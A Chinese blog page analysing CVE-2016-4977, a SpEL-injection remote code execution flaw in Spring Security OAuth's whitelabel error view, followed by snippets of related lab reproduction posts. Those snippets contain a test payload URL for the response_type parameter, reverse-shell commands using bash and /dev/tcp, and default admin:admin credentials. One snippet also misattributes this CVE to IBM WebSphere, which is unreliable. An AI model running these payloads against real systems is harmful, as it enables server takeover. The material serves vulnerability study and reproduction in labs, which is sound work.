CVE-2016-4977 RCE in Spring Security OAuth漏洞分析

最新推荐文章于 2025-11-10 11:35:15 发布
原创 最新推荐文章于 2025-11-10 11:35:15 发布 · 2.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细分析了CVE-2016-4977,一个Spring Security OAuth中的远程代码执行漏洞。当使用whitelabel视图处理认证请求时,response_type参数可能导致Spring SpEL执行恶意代码。通过下载并复盘官方示例,发现漏洞源于WhitelabelErrorEndpoint类中的异常处理方法。尽管生产环境受影响较小,但此漏洞提醒我们在使用组件时应遵循最小功能原则,减少攻击面。

新浪微博:

http://weibo.com/u/2275304001/home?wvr=5

微信公众号

DebugPwn


漏洞描述:

When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.

也就是说再处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过精心构造response_type值可以触发远程代码执行漏洞。实际分析下来,任何异常抛给handError来处理都会执行代码。


比源代码

diff1:

https://github.com/spring-projects/spring-security-oauth/commit/fff77d3fea477b566bcacfbfc95f85821a2bdc2d


最低0.47元/天 解锁文章
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1837
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
Spring远程代码执行漏洞CVE-2017-4971)
tbygadgjsad的博客
03-17 804
运行测试环境:docker-compose up -d 等待环境启动后,访问http://ip:8080,将看到一个酒店预订的页面 首先访问http://ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”:进行抓包 ...
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 2181
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 902
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
利用快马AI平台快速检测和修复Struts2高危漏洞CVE-2016-1000027)
最新发布
BlackironLynx23的博客
11-10 398
最近在维护一个基于Apache Struts2框架的Java Web项目时,遇到了CVE-2016-1000027这个高危漏洞的修复需求。这个远程代码执行漏洞一旦被利用,攻击者可以直接在服务器上执行任意代码,后果非常严重。经过一番探索,我发现使用。特别是部署测试环节,传统方式需要自己配置服务器和测试工具,而这里点击按钮就能自动完成,还能保存多次测试结果进行对比分析。,从漏洞检测到修复验证真的只需要几分钟操作,特别适合需要快速响应的紧急修复场景。这个功能让我直观认识到漏洞的严重性,也明确了修复的紧迫性。
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1371
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977
来到了学渣的博客
11-09 2045
访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要命令执行需要把执行结果带外才行,java的命令执行漏洞基本需要编码 http://www.jackson-t.ca/runti
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现-kali
qq_41760817的博客
12-04 1554
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现
CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞
weixin_54376843的博客
08-29 485
在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。然后输入构造好的反弹shell命令,回车继续执行。把执行结果粘贴出来,放在下面的payload中。将命令base64编码【随便找一个编码的网站。执行上面的脚本【在放脚本的目录下执行】输入账号密码admin admin。【攻击机IP+开启监听的端口】构造反弹shell命令【备用】最后去靶机关闭docker容器。
【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2527
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
CVE-2016-4977
09-01
CVE-2016-4977是指Spring Security OAuth2远程命令执行漏洞。该漏洞的复现过程可以参考第一篇和第二篇的参考链接。该漏洞的影响版本较广泛,具体版本信息可以在参考链接中找到。该漏洞的利用方式可以使用bash命令...
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
EC_Carrot的博客
08-02 824
漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。 漏洞复现 我们来进行反弹shell的操作,首先将bash命令进行编码: bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)——漏洞复现
weixin_42090431的博客
11-27 259
bash -i >& /dev/tcp/你的ip/6666 0>&1(对这部分base64编码)
CVE-2022-31692 Spring Security Oauth2 Client权限提升漏洞
LJQClqjc的博客
11-03 1935
棱镜七彩漏洞深度分析
Spring Security OAuth2 远程命令执行漏洞
wutiangui的博客
09-09 661
准备shell代码:bash -i >& /dev/tcp/192.168.155.2/1111 0>&1。python3 poc.py #输入要执行的命令,会返回处理后的命令,这里输入whoami。出现以下报错,表示漏洞存在(response_type里面的命令执行了)将上面的命令加入到response_type参数部分,得到变形后的url。返回了进程,表示代码执行了,但这没有回显,是无回显RCE。执行变形后的payload得到shell。用admin:admin登陆。六、Getshell。
RCE with spring-security-oauth2漏洞复现(CVE-2018-1260)
公众号shadow sock7
04-29 1240
参考:https://xz.aliyun.com/t/2330 初始化:先根据https://github.com/wanghongfei/spring-security-oauth2-example 将内容保存为init.sql文件,然后启动mysql:参考https://blog.youkuaiyun.com/caiqiiqi/article/details/89642032 然后载入sql脚本: mys...
漏洞复现笔记(CVE-2016-4977
weixin_72760965的博客
06-14 494
Spring Security OAuth 是为了Spring 框架提供安全认证支持的一个模块。在其使用 white label views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令影响范围环境搭建进入靶场开启靶场查看靶场信息docker ps访问网址。
CVE-2016-4977源码分析漏洞复现
spinage的博客
05-13 980
CVE-2016-4977Spring Security OAuth 模块中的一个高危远程代码执行漏洞,影响版本为 1.0.0–1.0.5 和 2.0.0–2.0.9。攻击者通过构造恶意 SpEL 表达式注入到错误处理流程中,触发远程命令执行。漏洞成因在于 WhitelabelErrorEndpoint 在处理错误信息时未对用户输入进行过滤,直接通过 SpelView 渲染模板,导致 SpEL 表达式被解析执行。攻击者可通过递归解析 ${} 内容绕过防御机制,执行任意命令。修复方案包括升级至安全版本、
Spring系列之CVE-2022-22947
weixin_51721627的博客
06-24 1330
Spring系列挺好的,好就好在全是漏洞
cve-2016-4977漏洞
12-27
### CVE-2016-4977 漏洞详情 CVE-2016-4977 是一个存在于 IBM WebSphere Application Server (WAS) 中的安全漏洞。该漏洞允许攻击者通过发送特制的 HTTP 请求来执行远程代码,从而完全控制受影响的应用程序服务器。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值